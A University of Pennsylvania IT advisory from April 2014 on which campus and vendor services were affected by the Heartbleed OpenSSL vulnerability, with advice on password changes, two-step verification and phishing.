Applications and Services Affected by the Heartbleed OpenSSL Vulnerability

Many University constituents are concerned about which applications and services they use that might be affected by the "Heartbleed”/OpenSSL vulnerability that was discovered on April 7th. This message gives some context and advice on how to determine which services are vulnerable and what to do if they are.

University-run applications and services

Penn's CoSign WebLogin service, the primary web-based authentication method used by Penn websites, is not vulnerable to this issue. Neither are other parts of Penn's central identity and access management infrastructure (e.g., wireless authentication portals).

Any Penn computers determined to be vulnerable were reported immediately and are being patched as quickly as possible. When they are patched, users of these services will be contacted by the system owner if a password change is recommended.

One University-supported desktop application, WS_FTP Professional 12.x, is currently known to be vulnerable, and is being patched. An updated installer will be made available as soon as possible.

University-affiliated applications and services

The University does business with thousands of third party vendors, and each one may respond differently to the vulnerability. If you have third-party applications or systems that you are concerned about, the first step is to check with the vendor directly, and determine if they were vulnerable, and if so if they have remediated the problem and whether or not they recommend any additional action for users.

Penn has already determined the status of several key University partners, including:

  • Amazon Web Services has many components, many of which were was generally not vulnerable, with some specific exceptions noted here:

http://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/

  • Box has patched the vulnerability. If you were not using the University’s single sign-on as your only way to log into Box, a password change is recommended.
  • Google has patched the vulnerability. A password change is recommended. Talk to your Local Support Provider if you have questions or concerns about this.

Other applications and services

CNET (a respected technology news site) is maintaining a list of the top 100 most used web sites, whether they were vulnerable, and whether they have been patched. If a site was vulnerable and has been patched, a password change is recommended. Another good reference is a Mashable article.

Of course, many less popular sites also will need to patched.

For more information

It is a good time to remember that periodic password resets are a best practice all the time, as is having unique passwords between different critical accounts. We continue to encourage all Pennkey holders to enroll in Two-Step Verification

http://www.upenn.edu/computing/weblogin/two-step/

which would mitigate this risk, as well as other attacks (such as phishing)

Finally, be on the lookout for fraudulent email claiming to be from companies with which you do business (including Penn), as criminals may use this event to create phishing email messages designed to trick people into divulging their passwords. No legitimate party from Penn will ever ask you to share your password, and if a campaign to change PennKey passwords was ever initiated, it would be well-communicated and easily verifiable.

Print This Page Share:
Date Posted: April 15, 2014 Tags: Security, Information Security and Privacy

Was this information helpful?

Login with PennKey to view and post comments